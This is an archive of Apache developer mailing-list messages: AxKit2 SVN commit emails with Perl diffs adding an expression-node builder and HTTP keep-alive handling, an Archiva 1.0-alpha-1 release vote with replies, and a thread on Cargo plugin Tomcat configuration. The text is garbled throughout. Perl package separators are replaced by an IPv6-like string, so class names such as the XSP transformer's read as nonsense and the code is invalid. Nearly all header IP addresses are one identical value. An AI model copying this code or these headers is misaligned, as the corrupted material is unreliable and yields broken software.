($self->{headers_in}->request_method eq "POST") { + $self->{ditch_leading_rn} = 1; + } + + # now since we're doing persistence, uncork so the last packet goes. + # we will recork when we're processing a new request. + # TODO: Disabled because this seemed mostly relevant to Perlbal... + #$self->tcp_cork(0); + + # reset state + $self->{alive_time} = $self->{create_time} = time; + $self->{headers_string} = ''; + $self->{headers_in} = undef; + $self->{headers_out} = undef; + $self->{http_headers_sent} = 0; + + # NOTE: because we only speak 1.0 to clients they can't have + # pipeline in a read that we haven't read yet. + $self->watch_read(1); + $self->watch_write(0); + return 1; +} + + # Cleanup routine to get rid of timed out sockets sub _do_cleanup { my $now = time; Modified: trunk/lib/AxKit2/Plugin.pm =================================================================== --- trunk/lib/AxKit2/Plugin.pm 2006-07-31 21:24:27 UTC (rev 23) +++ trunk/lib/AxKit2/Plugin.pm 2006-08-01 03:12:17 UTC (rev 24) @@ -9,7 +9,7 @@ # more or less in the order they will fire our @hooks = qw( logging config pre-connection connect post_read_request - uri_translation access_control authentication authorization + body_data uri_translation access_control authentication authorization fixup xmlresponse response disconnect error ); our %hooks = map { $_ => 1 } @hooks; From [email protected] Tue Aug 01 04:13:40 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 58157 invoked from network); 1 Aug 2006 04:13:40 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 1 Aug 2006 04:13:40 -0000 Received: (qmail 93835 invoked by uid 500); 1 Aug 2006 04:13:40 -0000 Delivered-To: [email protected] Received: (qmail 93822 invoked by uid 500); 1 Aug 2006 04:13:40 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <axkit-dev.xml.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 93811 invoked by uid 99); 1 Aug 2006 04:13:40 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 31 Jul 2006 21:13:40 -0700 X-ASF-Spam-Status: No, hits=2.6 required=10.0 tests=DNS_FROM_RFC_BOGUSMX,NO_REAL_NAME X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO bodger.sergeant.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Mon, 31 Jul 2006 21:13:37 -0700 Received: (qmail 20032 invoked by uid 510); 1 Aug 2006 04:13:12 -0000 Received: from msergeant.messagelabs.net (HELO localhost.localdomain) (161.129.204.104) by bodger.sergeant.org (qpsmtpd/0.28) with ESMTP; Tue, 01 Aug 2006 04:13:12 +0000 MIME-Version: 1.0 From: [email protected] Errors-To: [email protected] To: [email protected] Subject: [SVN] [25] Make <xsp:expr> handle arrayrefs and hashrefs transparently, and support an as-xml attribute which takes the expr as an XML well balanced chunk. X-Mailer: SVNacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bNotify 2.62: http://search.cpan.org/dist/SVN-Notify/ Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org X-Old-Spam-Status: unknown Message-Id: <[email protected]> Date: Mon, 31 Jul 2006 21:13:39 -0700 (PDT) X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Revision: 25 Author: matt Date: 2006-08-01 04:13:07 +0000 (Tue, 01 Aug 2006) Log Message: ----------- Make <xsp:expr> handle arrayrefs and hashrefs transparently, and support an as-xml attribute which takes the expr as an XML well balanced chunk. Modified Paths: -------------- trunk/lib/AxKit2/Transformer/XSP.pm Modified: trunk/lib/AxKit2/Transformer/XSP.pm =================================================================== --- trunk/lib/AxKit2/Transformer/XSP.pm 2006-08-01 03:12:17 UTC (rev 24) +++ trunk/lib/AxKit2/Transformer/XSP.pm 2006-08-01 04:13:07 UTC (rev 25) @@ -205,7 +205,7 @@ "package $e->{XSP_Package};", "use AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bConstants;", "use XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXML;", - "AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTransformeracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bXSPacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bPage->import( qw(__mk_text_node __mk_comment_node __mk_ns_element_node __mk_element_node) );", + "AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTransformeracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bXSPacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bPage->import( qw(__mk_expr_node __mk_text_node __mk_comment_node __mk_ns_element_node __mk_element_node) );", ($] >= 5.008?"use utf8;":""), ); @@ -610,15 +610,21 @@ if (AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTransformeracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bXSPacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bis_xsp_namespace($node->{Parent}->{NamespaceURI})) { if (!$e->manage_text() || $node->{Parent}->{Name} =~ /^(?:.*:)?(?:content|element)$/) { - return '__mk_text_node($document, $parent, "" . do {'; + return $attribs{'as-xml'} + ? '__mk_expr_node($document, $parent, 1, do {' + : '__mk_expr_node($document, $parent, 0, do {'; } elsif ($node->{Parent}->{Name} =~ /^(.*:)?(logic|expr)$/) { + # <xsp:expr> within <xsp:expr>... return 'do {'; } + # <xsp:expr> inside a taglib return ' . do {'; } else { - return '__mk_text_node($document, $parent, "" . do {'; + return $attribs{'as-xml'} + ? '__mk_expr_node($document, $parent, 1, do {' + : '__mk_expr_node($document, $parent, 0, do {'; } warn("EEEK - Should never get here!!!"); # warn "start Expr: CurrentEl: ", $e->current_element, "\n"; @@ -1010,6 +1016,7 @@ @AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTransformeracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bXSPacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bPagacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bISA = qw(Exporter); @AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTransformeracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bXSPacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bPagacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bEXPORT_OK = qw( + __mk_expr_node __mk_text_node __mk_element_node __mk_comment_node @@ -1039,6 +1046,53 @@ $parent->appendChild($node); } +sub __mk_expr_node { + my ($document, $parent, $as_xml, @data) = @_; + for my $data (@data) { + if ($as_xml) { + $parent->appendWellBalancedChunk($data); + return; + } + + if (my $ref = ref($data)) { + if ($ref eq 'ARRAY') { + my $i = 0; + for my $item (@$data) { + my $node = $document->createElement('item'); + $node->setAttribute('idx' => $i++); + __mk_expr_node($document, $node, $as_xml, $item); + $parent->appendChild($node); + } + } + elsif ($ref eq 'HASH') { + for my $k (keys %$data) { + my $item = $data->{$k}; + my $node; + if ($k =~ s/^(.*?)://) { + my $prefix = $1; + my $uri = $parent->lookupNamespaceURI($prefix) + || die "No namespace URI for prefix '$prefix'"; + $node = $document->createElementNS($uri, $k); + } + else { + $node = $document->createElement($k); + } + __mk_expr_node($document, $node, $as_xml, $item); + $parent->appendChild($node); + } + } + else { + die "expr can't yet handle ref type: $ref"; + } + } + else { + # we stringify here to make sure we don't pass undef in. + my $node = $document->createTextNode("$data"); + $parent->appendChild($node); + } + } +} + sub __mk_element_node { my ($document, $parent, $name) = @_; if ($name =~ s/^(.*?)://) {
From [email protected] Fri Jun 01 20:09:43 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 21959 invoked from network); 1 Jun 2007 20:09:41 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 1 Jun 2007 20:09:41 -0000 Received: (qmail 30300 invoked by uid 500); 1 Jun 2007 20:09:45 -0000 Delivered-To: [email protected] Received: (qmail 30252 invoked by uid 500); 1 Jun 2007 20:09:44 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 30243 invoked by uid 99); 1 Jun 2007 20:09:44 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 01 Jun 2007 13:09:44 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO mail.sventech.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 01 Jun 2007 13:09:40 -0700 Received: from mail.sventech.com (localhost.localdomain [161.129.204.104]) by mail.sventech.com (Postfix) with ESMTP id ACE394803C for <[email protected]>; Fri, 1 Jun 2007 20:09:18 +0000 (UTC) Received: from [161.129.204.104] (c-71-59-8-58.hsd1.ga.comcast.net [161.129.204.104]) by mail.sventech.com (Postfix) with ESMTP id 71BAB48020 for <[email protected]>; Fri, 1 Jun 2007 20:09:18 +0000 (UTC) Message-ID: <[email protected]> Date: Fri, 01 Jun 2007 16:14:31 -0400 From: Joakim Erdfelt <[email protected]> User-Agent: Thunderbird 161.129.204.104 (X11/20070501) MIME-Version: 1.0 To: Archiva Developers List <[email protected]> Subject: [VOTE] Release Archiva 1.0-alpha-1 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Scanned: ClamAV using ClamSMTP X-Virus-Checked: Checked by ClamAV on apache.org Archiva 1.0-alpha-1 was tagged and built this afternoon. The proposed distribution, including binary distributions, and signatures can be found here: http://people.apache.org/builds/maven/archiva/1.0-alpha-1/ To keep up with the trend started by Wendy Smoak (sorta): The 1.0-alpha-1 staged copy was setup and configured to point to a pre-built repository, and then used to build the next archiva snapshot (1.0-alpha-2-SNAPSHOT) in archiva/trunk. This will be Archiva's first release with a proper database, and is intended to get a testable baseline of the archiva feature set into the hands of all interested individuals. The list of issues identified and closed with this release can be found below: Archiva 1.0-alpha-1 Release Notes: http://jira.codehaus.org/secure/ReleaseNote.jspa?projectId=10980&styleName=Html&version=13443 This is an alpha release, and as such, has bugs. Once people have a chance to kick the prototype tires, and look around, the most urgent jira tickets will be addressed quickly for a 1.0-alpha-2 release, with an expected release 1 to 2 weeks after this one. Known issues include documentation, problems with proxying, problems running the webapp on Tomcat, missing reporting, empty or inaccurate dependency tree information, and poor grammar. These and other issues can be tracked at the URL below: Archiva 1.0-alpha-2 Open Issues: http://jira.codehaus.org/secure/IssueNavigator.jspa?reset=true&mode=hide&sorter/order=DESC&sorter/field=priority&resolution=-1&pid=10980&fixfor=13518 Once you have had a chance to examine the distribution, please cast your vote. We welcome votes and feedback from all community members. [ ] +1 Release it! [ ] 0 [ ] -1 Don't release it, because... 72 hours ends Monday afternoon (GMT -5) If you need more time, just ask. -- - Joakim Erdfelt Committer and PMC Member, Apache Maven Archiva Developer [email protected] [email protected] Alpaca Founding Member From [email protected] Fri Jun 01 20:19:18 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 23635 invoked from network); 1 Jun 2007 20:18:53 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 1 Jun 2007 20:18:52 -0000 Received: (qmail 42428 invoked by uid 500); 1 Jun 2007 20:18:56 -0000 Delivered-To: [email protected] Received: (qmail 42396 invoked by uid 500); 1 Jun 2007 20:18:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 42387 invoked by uid 99); 1 Jun 2007 20:18:56 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 01 Jun 2007 13:18:56 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO nz-out-0506.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 01 Jun 2007 13:18:51 -0700 Received: by nz-out-0506.google.com with SMTP id q3so612394nzb for <[email protected]>; Fri, 01 Jun 2007 13:18:30 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=QWCWWGVmUoneAwQpH1niB4pMrrKH8thOHzhESbrjwAvOCFYP/E5HATASSOYamc+z/PujwQuKP+Vsnup0LoeYgQuZBPLP3vSLXvEVax4hweQ49ag+yR3N3ftHeGx+bcvKeoQGptP354Op5duZRx/j7yt9e5kcYoB4SIK+feuxJgo= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=NcHxSF1GyjavhI3oWXN5FLwlq1fbG2zCfsOpC45Jb3P1Ha+bWnQccr4+TAwXh8pe8a+IFUJ/sNrr0OxWa4OnFdxAdkeb5Inx6iTkr83sQL72nT7tBgNLA5nHJLe6/nJiuia+75O4sqHfUq14TGIEQ/l2ciRbHPH2lB42fmKNoSs= Received: by 161.129.204.104 with SMTP id r16mr105632wfi.1180729109514; Fri, 01 Jun 2007 13:18:29 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Fri, 1 Jun 2007 13:18:29 -0700 (PDT) Message-ID: <[email protected]> Date: Fri, 1 Jun 2007 15:18:29 -0500 From: "Jesse McConnell" <[email protected]> To: [email protected] Subject: Re: [VOTE] Release Archiva 1.0-alpha-1 In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org +1 thanks joakim :) On 6/1/07, Joakim Erdfelt <[email protected]> wrote: > Archiva 1.0-alpha-1 was tagged and built this afternoon. > > The proposed distribution, including binary distributions, and > signatures can be found here: > > http://people.apache.org/builds/maven/archiva/1.0-alpha-1/ > > To keep up with the trend started by Wendy Smoak (sorta): > The 1.0-alpha-1 staged copy was setup and configured to point to > a pre-built repository, and then used to build the next archiva > snapshot (1.0-alpha-2-SNAPSHOT) in archiva/trunk. > > This will be Archiva's first release with a proper database, and > is intended to get a testable baseline of the archiva feature set > into the hands of all interested individuals. > > The list of issues identified and closed with this release can > be found below: > > Archiva 1.0-alpha-1 Release Notes: > > http://jira.codehaus.org/secure/ReleaseNote.jspa?projectId=10980&styleName=Html&version=13443 > > This is an alpha release, and as such, has bugs. > > Once people have a chance to kick the prototype tires, and look around, > the most urgent jira tickets will be addressed quickly for a 1.0-alpha-2 > release, with an expected release 1 to 2 weeks after this one. > > Known issues include documentation, problems with proxying, problems > running the webapp on Tomcat, missing reporting, empty or inaccurate > dependency tree information, and poor grammar. > These and other issues can be tracked at the URL below: > > Archiva 1.0-alpha-2 Open Issues: > http://jira.codehaus.org/secure/IssueNavigator.jspa?reset=true&mode=hide&sorter/order=DESC&sorter/field=priority&resolution=-1&pid=10980&fixfor=13518 > > Once you have had a chance to examine the distribution, please cast > your vote. We welcome votes and feedback from all community members. > > [ ] +1 Release it! > [ ] 0 > [ ] -1 Don't release it, because... > > 72 hours ends Monday afternoon (GMT -5) > If you need more time, just ask. > > -- > - Joakim Erdfelt > Committer and PMC Member, Apache Maven > Archiva Developer > [email protected] > [email protected] > Alpaca Founding Member > > -- jesse mcconnell [email protected] From [email protected] Fri Jun 01 20:40:23 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 29420 invoked from network); 1 Jun 2007 20:40:22 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 1 Jun 2007 20:40:22 -0000 Received: (qmail 74122 invoked by uid 500); 1 Jun 2007 20:40:26 -0000 Delivered-To: [email protected] Received: (qmail 74091 invoked by uid 500); 1 Jun 2007 20:40:26 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 74082 invoked by uid 99); 1 Jun 2007 20:40:26 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 01 Jun 2007 13:40:26 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO webmail9.amenworld.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Fri, 01 Jun 2007 13:40:20 -0700 Received: (qmail 19106 invoked from network); 1 Jun 2007 20:40:00 -0000 Received: from 167.210.72-86.rev.gaoland.net (HELO ?161.129.204.104?) (161.129.204.104) by 0 with SMTP; 1 Jun 2007 20:40:00 -0000 Message-ID: <[email protected]> Date: Fri, 01 Jun 2007 22:39:44 +0200 From: Emmanuel Venisse <[email protected]> User-Agent: Thunderbird 161.129.204.104 (Windows/20070509) MIME-Version: 1.0 To: [email protected] Subject: Re: [VOTE] Release Archiva 1.0-alpha-1 References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org +1 thanks for your big work. Emmanuel Joakim Erdfelt a écrit : > Archiva 1.0-alpha-1 was tagged and built this afternoon. > > The proposed distribution, including binary distributions, and > signatures can be found here: > > http://people.apache.org/builds/maven/archiva/1.0-alpha-1/ > > To keep up with the trend started by Wendy Smoak (sorta): > The 1.0-alpha-1 staged copy was setup and configured to point to > a pre-built repository, and then used to build the next archiva > snapshot (1.0-alpha-2-SNAPSHOT) in archiva/trunk. > > This will be Archiva's first release with a proper database, and > is intended to get a testable baseline of the archiva feature set > into the hands of all interested individuals. > > The list of issues identified and closed with this release can > be found below: > > Archiva 1.0-alpha-1 Release Notes: > > http://jira.codehaus.org/secure/ReleaseNote.jspa?projectId=10980&styleName=Html&version=13443 > > > This is an alpha release, and as such, has bugs. > > Once people have a chance to kick the prototype tires, and look around, > the most urgent jira tickets will be addressed quickly for a 1.0-alpha-2 > release, with an expected release 1 to 2 weeks after this one. > > Known issues include documentation, problems with proxying, problems > running the webapp on Tomcat, missing reporting, empty or inaccurate > dependency tree information, and poor grammar. > These and other issues can be tracked at the URL below: > > Archiva 1.0-alpha-2 Open Issues: > http://jira.codehaus.org/secure/IssueNavigator.jspa?reset=true&mode=hide&sorter/order=DESC&sorter/field=priority&resolution=-1&pid=10980&fixfor=13518 > > > Once you have had a chance to examine the distribution, please cast > your vote. We welcome votes and feedback from all community members. > > [ ] +1 Release it! > [ ] 0 > [ ] -1 Don't release it, because... > > 72 hours ends Monday afternoon (GMT -5) > If you need more time, just ask. > From [email protected] Sun Jun 03 05:33:07 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 94936 invoked from network); 3 Jun 2007 05:33:06 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 3 Jun 2007 05:33:06 -0000 Received: (qmail 36407 invoked by uid 500); 3 Jun 2007 05:33:10 -0000 Delivered-To: [email protected] Received: (qmail 36368 invoked by uid 500); 3 Jun 2007 05:33:10 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 36359 invoked by uid 99); 3 Jun 2007 05:33:09 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 02 Jun 2007 22:33:09 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO an-out-0708.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 02 Jun 2007 22:33:05 -0700 Received: by an-out-0708.google.com with SMTP id d30so298069and for <[email protected]>; Sat, 02 Jun 2007 22:32:44 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=Pwgz7ZekAb2vS0Agn5Bt0zWl1+tiRpIDMfuIp25F7+uRX8UAB1OTR1bzyLVSF36AIV+z3oqXeZ3mXHn8w4308+glPAA2GWOG1BHxpDE4qqnK/db3H+cuMqklnxGswqIm5jtAijKKkDCXSwfBgBiRhx2OuijmPPeD0Ia6SMYkcG4= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=EkYOVckLrmg4NIAFUGe+rZJMu+6XYC0BIYqLKih8Ndj547hCAGoqdzkrSuR7bRNEKjTqJeTlaK89hWmRhy3lMY/yt6C9xxD+NGIR4I2I4yCywBR+OByvrd/h4EN+wArCqAlHX8dbDYCX32jRg72eULwtIka8y0SVTzdbLs5T+xg= Received: by 161.129.204.104 with SMTP id m8mr1931804ang.1180848764464; Sat, 02 Jun 2007 22:32:44 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Sat, 2 Jun 2007 22:32:44 -0700 (PDT) Message-ID: <[email protected]> Date: Sat, 2 Jun 2007 22:32:44 -0700 From: "Wendy Smoak" <[email protected]> To: "Archiva Developers List" <[email protected]> Subject: Archiva, Tomcat, and Cargo MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline X-Virus-Checked: Checked by ClamAV on apache.org I added some Cargo plugin config to the archiva-webapp pom. It uses a cargo.tomcat5x.home property which you can put in settings.xml or supply on the command line. (As discussed on IRC, it can be configured to download the Tomcat .zip distribution from a known url, but I imagine most of us already have Tomcat installed. Besides, it doesn't actually work yet, because...) At this point I don't think Cargo supports configuring more than one data source in a standalone container, and Archiva of course needs three. That will take some digging in the Cargo code, which I haven't touched in quite a while. -- Wendy From [email protected] Sun Jun 03 23:44:30 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 9597 invoked from network); 3 Jun 2007 23:44:28 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 3 Jun 2007 23:44:28 -0000 Received: (qmail 30954 invoked by uid 500); 3 Jun 2007 23:44:32 -0000 Delivered-To: [email protected] Received: (qmail 30834 invoked by uid 500); 3 Jun 2007 23:44:32 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 30825 invoked by uid 99); 3 Jun 2007 23:44:31 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 03 Jun 2007 16:44:31 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO mx05.syd.iprimus.net.au) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 03 Jun 2007 16:44:27 -0700 X-IronPort-Anti-Spam-Filtered: true X-IronPort-Anti-Spam-Result: AgAAAOLuYkY6sjPZ/2dsb2JhbAAN X-IronPort-AV: E=Sophos;i="4.16,378,1175436000"; d="scan'208";a="49285055" Received: from 217.123.dsl.syd.iprimus.net.au (HELO [161.129.204.104]) ([161.129.204.104]) by smtp05.syd.iprimus.net.au with ESMTP; 04 Jun 2007 09:44:04 +1000 Mime-Version: 1.0 (Apple Message framework v752.3) In-Reply-To: <[email protected]> References: <[email protected]> Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: 7bit From: Brett Porter <[email protected]> Subject: Re: svn commit: r543842 - /maven/archiva/trunk/archiva-web/archiva-webapp/pom.xml Date: Mon, 4 Jun 2007 09:44:02 +1000 To: [email protected] X-Mailer: Apple Mail (2.752.3) X-Virus-Checked: Checked by ClamAV on apache.org You should be able to borrow the configuration from the selenium tests? On 03/06/2007, at 3:24 PM, [email protected] wrote: > Author: wsmoak > Date: Sat Jun 2 22:24:12 2007 > New Revision: 543842 > > URL: http://svn.apache.org/viewvc?view=rev&rev=543842 > Log: > Initial pass at configuring the Cargo plugin to start Archiva in > Tomcat. > TODO: Investigate config for data sources. > > Modified: > maven/archiva/trunk/archiva-web/archiva-webapp/pom.xml > > Modified: maven/archiva/trunk/archiva-web/archiva-webapp/pom.xml > URL: http://svn.apache.org/viewvc/maven/archiva/trunk/archiva-web/ > archiva-webapp/pom.xml?view=diff&rev=543842&r1=543841&r2=543842 > ====================================================================== > ======== > --- maven/archiva/trunk/archiva-web/archiva-webapp/pom.xml (original) > +++ maven/archiva/trunk/archiva-web/archiva-webapp/pom.xml Sat Jun > 2 22:24:12 2007 > @@ -397,6 +397,26 @@ > </execution> > </executions> > </plugin> > + <plugin> > + <!-- TODO: configure data sources --> > + <groupId>org.codehaus.cargo</groupId> > + <artifactId>cargo-maven2-plugin</artifactId> > + <version>0.3.1</version> > + <configuration> > + <container> > + <containerId>tomcat5x</containerId> > + <home>${cargo.tomcat5x.home}</home> > + <log>${project.build.directory}/tomcat5x.log</log> > + <output>${project.build.directory}/tomcat5x.out</ > output> > + </container> > + <configuration> > + <home>${project.build.directory}/tomcat5x</home> > + <properties> > + <cargo.jvmargs> -Xdebug - > Xrunjdwp:server=y,transport=dt_socket,address=8000,suspend=n </ > cargo.jvmargs> > + </properties> > + </configuration> > + </configuration> > + </plugin> > </plugins> > </build> > <profiles> > From [email protected] Sun Jun 03 23:50:23 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 11694 invoked from network); 3 Jun 2007 23:50:22 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 3 Jun 2007 23:50:22 -0000 Received: (qmail 36421 invoked by uid 500); 3 Jun 2007 23:50:26 -0000 Delivered-To: [email protected] Received: (qmail 36308 invoked by uid 500); 3 Jun 2007 23:50:26 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 36299 invoked by uid 99); 3 Jun 2007 23:50:26 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 03 Jun 2007 16:50:26 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO an-out-0708.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 03 Jun 2007 16:50:20 -0700 Received: by an-out-0708.google.com with SMTP id d30so334270and for <[email protected]>; Sun, 03 Jun 2007 16:49:59 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=fPsLN0XfQXtxW4OfEccRI3ffGJwJI3M25ps/2ieJXTtMJfuHQMES/zQheritfdLRNRFIDS7CV74HwG49ohK4bZUc9h6dnLTB7k3smf9X4Mp8GQwEp1fGP4BeN1TyRi+k72s9jTPSCbZz4oRh23zDXhUdvfNl1wviNSX3PdoNprQ= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=X47Nr5YiYfBx/ivy1MmJ7Iupt8ogRCFa9kARoGFBptkNJsLN26D01NOvqvs+7UN08KiMrEKHrrCFqxVILre0Kn7gnYhczWwWcGwvLT8nvR1Z2DesCFR3R+RlN/N0xKHhog7YWgaqAsNaprWWVBcdtceWWEVDvVhZWeTGf1wcmrM= Received: by 161.129.204.104 with SMTP id o6mr2283914anb.1180914599298; Sun, 03 Jun 2007 16:49:59 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Sun, 3 Jun 2007 16:49:59 -0700 (PDT) Message-ID: <[email protected]> Date: Sun, 3 Jun 2007 16:49:59 -0700 From: "Wendy Smoak" <[email protected]> To: [email protected] Subject: Re: svn commit: r543842 - 